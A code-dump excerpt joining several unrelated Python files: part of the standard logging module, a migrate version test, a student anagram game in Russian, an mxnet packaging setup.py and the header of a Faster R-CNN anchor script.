self.level = _checkLevel(level)
self.formatter = None
# Add the handler to the global _handlerList (for cleanup on shutdown)
_addHandlerRef(self)
self.createLock()
def get_name(self):
return self._name
def set_name(self, name):
_acquireLock()
try:
if self._name in _handlers:
del _handlers[self._name]
self._name = name
if name:
_handlers[name] = self
finally:
_releaseLock()
name = property(get_name, set_name)
def createLock(self):
"""
Acquire a thread lock for serializing access to the underlying I/O.
"""
if threading:
self.lock = threading.RLock()
else: #pragma: no cover
self.lock = None
def acquire(self):
"""
Acquire the I/O thread lock.
"""
if self.lock:
self.lock.acquire()
def release(self):
"""
Release the I/O thread lock.
"""
if self.lock:
self.lock.release()
def setLevel(self, level):
"""
Set the logging level of this handler. level must be an int or a str.
"""
self.level = _checkLevel(level)
def format(self, record):
"""
Format the specified record.
If a formatter is set, use it. Otherwise, use the default formatter
for the module.
"""
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
"""
Do whatever it takes to actually log the specified logging record.
This version is intended to be implemented by subclasses and so
raises a NotImplementedError.
"""
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
def handle(self, record):
"""
Conditionally emit the specified logging record.
Emission depends on filters which may have been added to the handler.
Wrap the actual emission of the record with acquisition/release of
the I/O thread lock. Returns whether the filter passed the record for
emission.
"""
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
"""
Set the formatter for this handler.
"""
self.formatter = fmt
def flush(self):
"""
Ensure all logging output has been flushed.
This version does nothing and is intended to be implemented by
subclasses.
"""
pass
def close(self):
"""
Tidy up any resources used by the handler.
This version removes the handler from an internal map of handlers,
_handlers, which is used for handler lookup by name. Subclasses
should ensure that this gets called from overridden close()
methods.
"""
#get the module data lock, as we're updating a shared structure.
_acquireLock()
try: #unlikely to raise an exception, but you never know...
if self._name and self._name in _handlers:
del _handlers[self._name]
finally:
_releaseLock()
def handleError(self, record):
"""
Handle errors which occur during an emit() call.
This method should be called from handlers when an exception is
encountered during an emit() call. If raiseExceptions is false,
exceptions get silently ignored. This is what is mostly wanted
for a logging system - most users will not care about errors in
the logging system, they are more interested in application errors.
You could, however, replace this with a custom handler if you wish.
The record which was being processed is passed in to this method.
"""
if raiseExceptions and sys.stderr: # see issue 13807
t, v, tb = sys.exc_info()
try:
sys.stderr.write('--- Logging error ---\n')
traceback.print_exception(t, v, tb, None, sys.stderr)
sys.stderr.write('Call stack:\n')
# Walk the stack frame up until we're out of logging,
# so as to print the calling context.
frame = tb.tb_frame
while (frame and os.path.dirname(frame.f_code.co_filename) ==
__path__[0]):
frame = frame.f_back
if frame:
traceback.print_stack(frame, file=sys.stderr)
else:
# couldn't find the right stack frame, for some reason
sys.stderr.write('Logged from file %s, line %s\n' % (
record.filename, record.lineno))
# Issue 18671: output logging message and arguments
try:
sys.stderr.write('Message: %r\n'
'Arguments: %s\n' % (record.msg,
record.args))
except Exception:
sys.stderr.write('Unable to print the message and arguments'
' - possible formatting error.\nUse the'
' traceback above to help find the error.\n'
)
except OSError: #pragma: no cover
pass # see issue 5971
finally:
del t, v, tb
class StreamHandler(Handler):
"""
A handler class which writes logging records, appropriately formatted,
to a stream. Note that this class does not close the stream, as
sys.stdout or sys.stderr may be used.
"""
terminator = '\n'
def __init__(self, stream=None):
"""
Initialize the handler.
If stream is not specified, sys.stderr is used.
"""
Handler.__init__(self)
if stream is None:
stream = sys.stderr
self.stream = stream
def flush(self):
"""
Flushes the stream.
"""
self.acquire()
try:
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
finally:
self.release()
def emit(self, record):
"""
Emit a record.
If a formatter is specified, it is used to format the record.
The record is then written to the stream with a trailing newline. If
exception information is present, it is formatted using
traceback.print_exception and appended to the stream. If the stream
has an 'encoding' attribute, it is used to determine how to do the
output to the stream.
"""
try:
msg = self.format(record)
stream = self.stream
stream.write(msg)
stream.write(self.terminator)
self.flush()
except Exception:
self.handleError(record)
class FileHandler(StreamHandler):
"""
A handler class which writes formatted logging records to disk files.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
"""
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
self.delay = delay
if delay:
#We don't open the stream, but we still need to call the
#Handler constructor to set level, formatter, lock etc.
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
"""
Closes the stream.
"""
self.acquire()
try:
if self.stream:
self.flush()
if hasattr(self.stream, "close"):
self.stream.close()
self.stream = None
# Issue #19523: call unconditionally to
# prevent a handler leak when delay is set
StreamHandler.close(self)
finally:
self.release()
def _open(self):
"""
Open the current base file with the (original) mode and encoding.
Return the resulting stream.
"""
return open(self.baseFilename, self.mode, encoding=self.encoding)
def emit(self, record):
"""
Emit a record.
If the stream was not opened because 'delay' was specified in the
constructor, open it before calling the superclass's emit.
"""
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
class _StderrHandler(StreamHandler):
"""
This class is like a StreamHandler using sys.stderr, but always uses
whatever sys.stderr is currently set to rather than the value of
sys.stderr at handler construction time.
"""
def __init__(self, level=NOTSET):
"""
Initialize the handler.
"""
Handler.__init__(self, level)
@property
def stream(self):
return sys.stderr
_defaultLastResort = _StderrHandler(WARNING)
lastResort = _defaultLastResort
#---------------------------------------------------------------------------
# Manager classes and functions
#---------------------------------------------------------------------------
class PlaceHolder(object):
"""
PlaceHolder instances are used in the Manager logger hierarchy to take
the place of nodes for which no loggers have been defined. This class is
intended for internal use only and not as part of the public API.
"""
def __init__(self, alogger):
"""
Initialize with the specified logger being a child of this placeholder.
"""
self.loggerMap = { alogger : None }
def append(self, alogger):
"""
Add the specified logger as a child of this placeholder.
"""
if alogger not in self.loggerMap:
self.loggerMap[alogger] = None
#
# Determine which class to use when instantiating loggers.
#
_loggerClass = None
def setLoggerClass(klass):
"""
Set the class to be used when instantiating a logger. The class should
define __init__() such that only a name argument is required, and the
__init__() should call Logger.__init__()
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
def getLoggerClass():
"""
Return the class to be used when instantiating a logger.
"""
return _loggerClass
class Manager(object):
"""
There is [under normal circumstances] just one Manager instance, which
holds the hierarchy of loggers.
"""
def __init__(self, rootnode):
"""
Initialize the manager with the root node of the logger hierarchy.
"""
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = False
self.loggerDict = {}
self.loggerClass = None
self.logRecordFactory = None
def getLogger(self, name):
"""
Get a logger with the specified name (channel name), creating it
if it doesn't yet exist. This name is a dot-separated hierarchical
name, such as "a", "a.b", "a.b.c" or similar.
If a PlaceHolder existed for the specified name [i.e. the logger
didn't exist but a child of it did], replace it with the created
logger and fix up the parent/child references which pointed to the
placeholder to now point to the logger.
"""
rv = None
if not isinstance(name, str):
raise TypeError('A logger name must be a string')
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
def setLoggerClass(self, klass):
"""
Set the class to be used when instantiating a logger with this Manager.
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
self.loggerClass = klass
def setLogRecordFactory(self, factory):
"""
Set the factory to be used when instantiating a log record with this
Manager.
"""
self.logRecordFactory = factory
def _fixupParents(self, alogger):
"""
Ensure that there are either loggers or placeholders all the way
from the specified logger to the root of the logger hierarchy.
"""
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
"""
Ensure that children of the placeholder ph are connected to the
specified logger.
"""
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
#The if means ... if not c.parent.name.startswith(nm)
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
#---------------------------------------------------------------------------
# Logger classes and functions
#---------------------------------------------------------------------------
class Logger(Filterer):
"""
Instances of the Logger class represent a single logging channel. A
"logging channel" indicates an area of an application. Exactly how an
"area" is defined is up to the application developer. Since an
application can have any number of areas, logging channels are identified
by a unique string. Application areas can be nested (e.g. an area
of "input processing" might include sub-areas "read CSV files", "read
XLS files" and "read Gnumeric files"). To cater for this natural nesting,
channel names are organized into a namespace hierarchy where levels are
separated by periods, much like the Java or Python package namespace. So
in the instance given above, channel names might be "input" for the upper
level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels.
There is no arbitrary limit to the depth of nesting.
"""
def __init__(self, name, level=NOTSET):
"""
Initialize the logger with a name and an optional level.
"""
Filterer.__init__(self)
self.name = name
self.level = _checkLevel(level)
self.parent = None
self.propagate = True
self.handlers = []
self.disabled = False
def setLevel(self, level):
"""
Set the logging level of this logger. level must be an int or a str.
"""
self.level = _checkLevel(level)
def debug(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'DEBUG'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.debug("Houston, we have a %s", "thorny problem", exc_info=1)
"""
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'INFO'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.info("Houston, we have a %s", "interesting problem", exc_info=1)
"""
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'WARNING'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1)
"""
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'ERROR'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.error("Houston, we have a %s", "major problem", exc_info=1)
"""
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Convenience method for logging an ERROR with exception information.
"""
kwargs['exc_info'] = True
self.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'CRITICAL'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.critical("Houston, we have a %s", "major disaster", exc_info=1)
"""
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
fatal = critical
def log(self, level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.log(level, "We have a %s", "mysterious problem", exc_info=1)
"""
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self, stack_info=False):
"""
Find the stack frame of the caller so that we can note the source
file name, line number and function name.
"""
f = currentframe()
#On some versions of IronPython, currentframe() returns None if
#IronPython isn't run with -X:Frames.
if f is not None:
f = f.f_back
rv = "(unknown file)", 0, "(unknown function)", None
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
sinfo = None
if stack_info:
sio = io.StringIO()
sio.write('Stack (most recent call last):\n')
traceback.print_stack(f, file=sio)
sinfo = sio.getvalue()
if sinfo[-1] == '\n':
sinfo = sinfo[:-1]
sio.close()
rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
"""
A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,
sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):
"""
Low-level logging routine which creates a LogRecord and then calls
all the handlers of this logger to handle the record.
"""
sinfo = None
if _srcfile:
#IronPython doesn't track Python frames, so findCaller raises an
#exception on some versions of IronPython. We trap it here so that
#IronPython can use logging.
try:
fn, lno, func, sinfo = self.findCaller(stack_info)
except ValueError: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
exc_info, func, extra, sinfo)
self.handle(record)
def handle(self, record):
"""
Call the handlers for the specified record.
This method is used for unpickled records received from a socket, as
well as those created locally. Logger-level filtering is applied.
"""
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
"""
Add the specified handler to this logger.
"""
_acquireLock()
try:
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
finally:
_releaseLock()
def removeHandler(self, hdlr):
"""
Remove the specified handler from this logger.
"""
_acquireLock()
try:
if hdlr in self.handlers:
self.handlers.remove(hdlr)
finally:
_releaseLock()
def hasHandlers(self):
"""
See if this logger has any handlers configured.
Loop through all handlers for this logger and its parents in the
logger hierarchy. Return True if a handler was found, else False.
Stop searching up the hierarchy whenever a logger with the "propagate"
attribute set to zero is found - that will be the last logger which
is checked for the existence of handlers.
"""
c = self
rv = False
while c:
if c.handlers:
rv = True
break
if not c.propagate:
break
else:
c = c.parent
return rv
def callHandlers(self, record):
"""
Pass a record to all relevant handlers.
Loop through all handlers for this logger and its parents in the
logger hierarchy. If no handler was found, output a one-off error
message to sys.stderr. Stop searching up the hierarchy whenever a
logger with the "propagate" attribute set to zero is found - that
will be the last logger whose handlers are called.
"""
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None #break out
else:
c = c.parent
if (found == 0):
if lastResort:
if record.levelno >= lastResort.level:
lastResort.handle(record)
elif raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = True
def getEffectiveLevel(self):
"""
Get the effective level for this logger.
Loop through this logger and its parents in the logger hierarchy,
looking for a non-zero logging level. Return the first one found.
"""
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getChild(self, suffix):
"""
Get a logger which is a descendant to this one.
This is a convenience method, such that
logging.getLogger('abc').getChild('def.ghi')
is the same as
logging.getLogger('abc.def.ghi')
It's useful, for example, when the parent logger is named using
__name__ rather than a literal string.
"""
if self.root is not self:
suffix = '.'.join((self.name, suffix))
return self.manager.getLogger(suffix)
class RootLogger(Logger):
"""
A root logger is not that different to any other logger, except that
it must have a logging level and there is only one instance of it in
the hierarchy.
"""
def __init__(self, level):
"""
Initialize the logger with the name "root".
"""
Logger.__init__(self, "root", level)
_loggerClass = Logger
class LoggerAdapter(object):
"""
An adapter for loggers which makes it easier to specify contextual
information in logging output.
"""
def __init__(self, logger, extra):
"""
Initialize the adapter with a logger and a dict-like object which
provides contextual information. This constructor signature allows
easy stacking of LoggerAdapters, if so desired.
You can effectively pass keyword arguments as shown in the
following example:
adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2"))
"""
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
"""
Process the logging message and keyword arguments passed in to
a logging call to insert contextual information. You can either
manipulate the message itself, the keyword args or both. Return
the message and kwargs modified (or not) to suit your needs.
Normally, you'll only need to override this one method in a
LoggerAdapter subclass for your specific needs.
"""
kwargs["extra"] = self.extra
return msg, kwargs
#
# Boilerplate convenience methods
#
def debug(self, msg, *args, **kwargs):
"""
Delegate a debug call to the underlying logger.
"""
self.log(DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Delegate an info call to the underlying logger.
"""
self.log(INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Delegate a warning call to the underlying logger.
"""
self.log(WARNING, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Delegate an error call to the underlying logger.
"""
self.log(ERROR, msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Delegate an exception call to the underlying logger.
"""
kwargs["exc_info"] = True
self.log(ERROR, msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Delegate a critical call to the underlying logger.
"""
self.log(CRITICAL, msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Delegate a log call to the underlying logger, after adding
contextual information from this adapter instance.
"""
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def setLevel(self, level):
"""
Set the specified level on the underlying logger.
"""
self.logger.setLevel(level)
def getEffectiveLevel(self):
"""
Get the effective level for the underlying logger.
"""
return self.logger.getEffectiveLevel()
def hasHandlers(self):
"""
See if the underlying logger has any handlers.
"""
return self.logger.hasHandlers()
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
def basicConfig(**kwargs):
"""
Do basic configuration for the logging system.
This function does nothing if the root logger already has handlers
configured. It is a convenience method intended for use by simple scripts
to do one-shot configuration of the logging package.
The default behaviour is to create a StreamHandler which writes to
sys.stderr, set a formatter using the BASIC_FORMAT format string, and
add the handler to the root logger.
A number of optional keyword arguments may be specified, which can alter
the default behaviour.
filename Specifies that a FileHandler be created, using the specified
filename, rather than a StreamHandler.
filemode Specifies the mode to open the file, if filename is specified
(if filemode is unspecified, it defaults to 'a').
format Use the specified format string for the handler.
datefmt Use the specified date/time format.
style If a format string is specified, use this to specify the
type of format string (possible values '%', '{', '$', for
%-formatting, :meth:`str.format` and :class:`string.Template`
- defaults to '%').
level Set the root logger level to the specified level.
stream Use the specified stream to initialize the StreamHandler. Note
that this argument is incompatible with 'filename' - if both
are present, 'stream' is ignored.
handlers If specified, this should be an iterable of already created
handlers, which will be added to the root handler. Any handler
in the list which does not have a formatter assigned will be
assigned the formatter created in this function.
Note that you could specify a stream created using open(filename, mode)
rather than passing the filename and mode in. However, it should be
remembered that StreamHandler does not close its stream (since it may be
using sys.stdout or sys.stderr), whereas FileHandler closes its stream
when the handler is closed.
.. versionchanged:: 3.2
Added the ``style`` parameter.
.. versionchanged:: 3.3
Added the ``handlers`` parameter. A ``ValueError`` is now thrown for
incompatible arguments (e.g. ``handlers`` specified together with
``filename``/``filemode``, or ``filename``/``filemode`` specified
together with ``stream``, or ``handlers`` specified together with
``stream``.
"""
# Add thread safety in case someone mistakenly calls
# basicConfig() from multiple threads
_acquireLock()
try:
if len(root.handlers) == 0:
handlers = kwargs.get("handlers")
if handlers is None:
if "stream" in kwargs and "filename" in kwargs:
raise ValueError("'stream' and 'filename' should not be "
"specified together")
else:
if "stream" in kwargs or "filename" in kwargs:
raise ValueError("'stream' or 'filename' should not be "
"specified together with 'handlers'")
if handlers is None:
filename = kwargs.get("filename")
if filename:
mode = kwargs.get("filemode", 'a')
h = FileHandler(filename, mode)
else:
stream = kwargs.get("stream")
h = StreamHandler(stream)
handlers = [h]
dfs = kwargs.get("datefmt", None)
style = kwargs.get("style", '%')
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
fs = kwargs.get("format", _STYLES[style][1])
fmt = Formatter(fs, dfs, style)
for h in handlers:
if h.formatter is None:
h.setFormatter(fmt)
root.addHandler(h)
level = kwargs.get("level")
if level is not None:
root.setLevel(level)
finally:
_releaseLock()
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
"""
Return a logger with the specified name, creating it if necessary.
If no name is specified, return the root logger.
"""
if name:
return Logger.manager.getLogger(name)
else:
return root
def critical(msg, *args, **kwargs):
"""
Log a message with severity 'CRITICAL' on the root logger. If the logger
has no handlers, call basicConfig() to add a console handler with a
pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.critical(msg, *args, **kwargs)
fatal = critical
def error(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.error(msg, *args, **kwargs)
def exception(msg, *args, **kwargs):
"""
Log a message with severity 'ERROR' on the root logger, with exception
information. If the logger has no handlers, basicConfig() is called to add
a console handler with a pre-defined format.
"""
kwargs['exc_info'] = True
error(msg, *args, **kwargs)
def warning(msg, *args, **kwargs):
"""
Log a message with severity 'WARNING' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.warning(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
warnings.warn("The 'warn' function is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
warning(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
"""
Log a message with severity 'INFO' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.info(msg, *args, **kwargs)
def debug(msg, *args, **kwargs):
"""
Log a message with severity 'DEBUG' on the root logger. If the logger has
no handlers, call basicConfig() to add a console handler with a pre-defined
format.
"""
if len(root.handlers) == 0:
basicConfig()
root.debug(msg, *args, **kwargs)
def log(level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level' on the root logger. If
the logger has no handlers, call basicConfig() to add a console handler
with a pre-defined format.
"""
if len(root.handlers) == 0:
basicConfig()
root.log(level, msg, *args, **kwargs)
def disable(level):
"""
Disable all logging calls of severity 'level' and below.
"""
root.manager.disable = level
def shutdown(handlerList=_handlerList):
"""
Perform any cleanup actions in the logging system (e.g. flushing
buffers).
Should be called at application exit.
"""
for wr in reversed(handlerList[:]):
#errors might occur, for example, if files are locked
#we just ignore them if raiseExceptions is not set
try:
h = wr()
if h:
try:
h.acquire()
h.flush()
h.close()
except (OSError, ValueError):
# Ignore errors which might be caused
# because handlers have been closed but
# references to them are still around at
# application exit.
pass
finally:
h.release()
except: # ignore everything, as we're shutting down
if raiseExceptions:
raise
#else, swallow
#Let's try and shutdown automatically on application exit...
import atexit
atexit.register(shutdown)
# Null handler
class NullHandler(Handler):
"""
This handler does nothing. It's intended to be used to avoid the
"No handlers could be found for logger XXX" one-off warning. This is
important for library code, which may contain code to log events. If a user
of the library does not configure logging, the one-off warning might be
produced; to avoid this, the library developer simply needs to instantiate
a NullHandler and add it to the top-level logger of the library module or
package.
"""
def handle(self, record):
"""Stub."""
def emit(self, record):
"""Stub."""
def createLock(self):
self.lock = None
# Warnings integration
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
Implementation of showwarnings which redirects to logging, which will first
check to see if the file parameter is None. If a file is specified, it will
delegate to the original warnings implementation of showwarning. Otherwise,
it will call warnings.formatwarning and will log the resulting string to a
warnings logger named "py.warnings" with level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(message, category, filename, lineno, line)
logger = getLogger("py.warnings")
if not logger.handlers:
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
|
fubecka/f5-dashboard
|
refs/heads/master
|
flask/lib/python2.6/site-packages/migrate/tests/__init__.py
|
78
|
# make this package available during imports as long as we support <python2.5
import sys
import os
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from unittest import TestCase
import migrate
import six
class TestVersionDefined(TestCase):
def test_version(self):
"""Test for migrate.__version__"""
self.assertTrue(isinstance(migrate.__version__, six.string_types))
self.assertTrue(len(migrate.__version__) > 0)
|
Mariaanisimova/pythonintask
|
refs/heads/master
|
INBa/2015/Mitin_D_S/task_8_15.py
|
1
|
# Задача 8. Вариант 15.
# Доработайте игру "Анаграммы" (см. М.Доусон Программируем на Python. Гл.4) так, чтобы к каждому слову полагалась подсказка.
# Игрок должен получать право на подсказку в том случае, если у него нет никаких предположений.
# Разработайте систему начисления очков, по которой бы игроки, отгадавшие слово без подсказки, получали больше тех, кто запросил подсказку.
# Mitin D.S.
# 19.04.2016, 11:08
import random
ochki = 500000
slova = ("питон", "программирование", "компьютер", "университет", "россия", "безопасность", "информатика")
zagadka=random.choice(slova)
proverka = zagadka
i=0
jumble = ""
while zagadka:
bykva = random.randrange(len(zagadka))
jumble += zagadka[bykva]
zagadka = zagadka[:bykva] + zagadka[(bykva+1):]
print("Вы попали в передачу 'Анаграммы'")
print("Загаданное слово: ", jumble)
slovo = input ("Ваш ответ: ")
while (slovo != proverka):
if(slovo == "не знаю"):
print(i,"буква: ",proverka[i])
i+=1
if ochki <= 0:
break
slovo=input("Неправильно. Попробуй еще раз: ")
ochki-=50000
if slovo == proverka:
print("\nПравильно! Это слово: ", proverka)
print("Вы набрали",ochki," очков! Поздравляем!")
else:
print("К сожалению, у вас 0 очков, и вы проиграли :( Загаданное слово:",proverka)
input ("Нажмите ENTER для продолжения")
|
jermainewang/mxnet
|
refs/heads/master
|
tools/pip_package/setup.py
|
45
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, exec-used
"""Setup mxnet package."""
from __future__ import absolute_import
import os
import shutil
from setuptools import setup, find_packages
from setuptools.dist import Distribution
# We can not import `mxnet.info.py` in setup.py directly since mxnet/__init__.py
# Will be invoked which introduces dependences
CURRENT_DIR = os.path.dirname(__file__)
libinfo_py = os.path.join(CURRENT_DIR, '../../python/mxnet/libinfo.py')
libinfo = {'__file__': libinfo_py}
exec(compile(open(libinfo_py, "rb").read(), libinfo_py, 'exec'), libinfo, libinfo)
LIB_PATH = libinfo['find_lib_path']()
__version__ = libinfo['__version__']
class BinaryDistribution(Distribution):
def has_ext_modules(self):
return True
DEPENDENCIES = [
'numpy',
]
shutil.rmtree(os.path.join(CURRENT_DIR, 'mxnet'), ignore_errors=True)
shutil.copytree(os.path.join(CURRENT_DIR, '../../python/mxnet'),
os.path.join(CURRENT_DIR, 'mxnet'))
shutil.copy(LIB_PATH[0], os.path.join(CURRENT_DIR, 'mxnet'))
setup(name='mxnet',
version=__version__,
description=open(os.path.join(CURRENT_DIR, 'README.md')).read(),
zip_safe=False,
packages=find_packages(),
package_data={'mxnet': [os.path.join('mxnet', os.path.basename(LIB_PATH[0]))]},
include_package_data=True,
install_requires=DEPENDENCIES,
distclass=BinaryDistribution,
url='https://github.com/dmlc/mxnet')
|
EricssonResearch/scott-eu
|
refs/heads/master
|
simulation-ros/src/turtlebot2i/turtlebot2i_msdn/msdn/faster_rcnn/rpn_msr/generate_anchors.py
|
1
|
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Sean Bell
# --------------------------------------------------------
import numpy as np
# Verify that we compute the same anchors as Shaoqing's matlab implementation:
#
# >> load output/rpn_cachedir/faster_rcnn_VOC2007_ZF_stage1_rpn/anchors.mat
# >> anchors
#
# anchors =
#
# -83 -39 100 56
# -175 -87 192 104
# -359 -183 376 200
# -55 -55 72 72
# -119 -119 136 136
# -247 -247 264 264
# -35 -79 52 96
# -79 -167 96 184
# -167 -343 184 360
#array([[ -83., -39., 100., 56.],
# [-175., -87., 192., 104.],
# [-359., -183., 376., 200.],
# [ -55., -55., 72., 72.],
# [-119., -119., 136., 136.],
# [-247., -247., 264., 264.],
# [ -35., -79., 52., 96.],
# [ -79., -167., 96., 184.],
